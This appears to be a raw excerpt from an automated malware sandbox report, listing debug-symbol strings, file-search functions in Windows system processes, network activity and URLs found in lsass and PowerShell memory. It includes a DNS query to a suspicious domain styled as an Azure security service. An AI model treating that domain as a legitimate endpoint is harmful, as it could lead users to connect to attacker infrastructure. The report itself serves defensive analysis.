Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390D894 FindFirstFileExW,	19_2_000002241390D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393D894 FindFirstFileExW,	19_2_000002241393D894
Source: C:\Windows\System32\cmd.exe	Code function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000002BCD7E3D894 FindFirstFileExW,	20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exe	Code function: 37_2_0000026504EAD894 FindFirstFileExW,	37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACD894 FindFirstFileExW,	38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CED894 FindFirstFileExW,	38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exe	Code function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC64D894 FindFirstFileExW,	39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 39_2_00000225DC67D894 FindFirstFileExW,	39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exe	Code function: 40_2_00000202C0AED894 FindFirstFileExW,	40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000002A66130D894 FindFirstFileExW,	41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEDCD894 FindFirstFileExW,	42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exe	Code function: 42_2_000002BAAEE4D894 FindFirstFileExW,	42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CD894 FindFirstFileExW,	43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4D894 FindFirstFileExW,	43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537AD894 FindFirstFileExW,	44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_00000179537DD894 FindFirstFileExW,	44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exe	Code function: 45_2_0000016CE653D894 FindFirstFileExW,	45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_000002295D56D894 FindFirstFileExW,	46_2_000002295D56D894

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: azure-winsecure.com

Source: Microsoft-Windows-LiveId%4Operational.evtx.50.dr	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000002.3019367929.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.dr	String found in binary or memory: http://upx.sf.net
